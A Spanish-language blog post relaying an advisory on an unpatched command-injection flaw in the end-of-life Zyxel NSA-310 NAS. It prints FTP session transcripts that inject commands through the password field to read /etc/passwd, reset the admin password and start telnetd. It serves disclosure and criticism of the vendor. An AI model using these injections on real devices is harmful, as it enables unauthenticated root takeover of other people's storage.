Zyxel no soluciona una vulnerabilidad grave en una de sus NAS por vieja (EoL)... pero sigue vendiéndola!

Recientemente se ha reportado una vulnerabilidad grave en el Mediaserver/NAS modelo ZyXEL NSA-310 que permite a atacantes remotos ejecutar código arbitrariamente como root. 

Ya se conocía la de existencia de un backdoor en el último firmware V4.70(AFK.1), muy apropiado para un producto que lleva como nombre "NSA...", pero es que además es posible usar una comilla simple "'" para introducir comandos de sistema.
 

Veamos unos ejemplos:
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';cat /etc/passwd;
root:x:0:0:root:/root:/bin/sh
Como veis podemos usar el servidor FTP para mostrar el contenido del fichero passwd.

Además es posible cambiar la contraseña del admin sin conocer la anterior llamando al script del sistema /sbin/account.sh:

Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220 ­You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';/sbin/account.sh;

Una vez hecho ésto la contraseña se habrá restablecido a la de por defecto, es decir, admin/1234.

Por último, podemos también arrancar un demonio telnetd al que acceder como:

admin / changed_pw

 root / changed_pw

Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';telnetd;

Zyxel se niega a solucionar la vulnerabilidad porque hace dos años que se llegó al EoL, pero lo cachondo es que todavía lo siguen vendiendo en Amazon...



Fuente: SSD Advisory – Zyxel Remote Unauthenticated Code Execution (NSA310)

Comentarios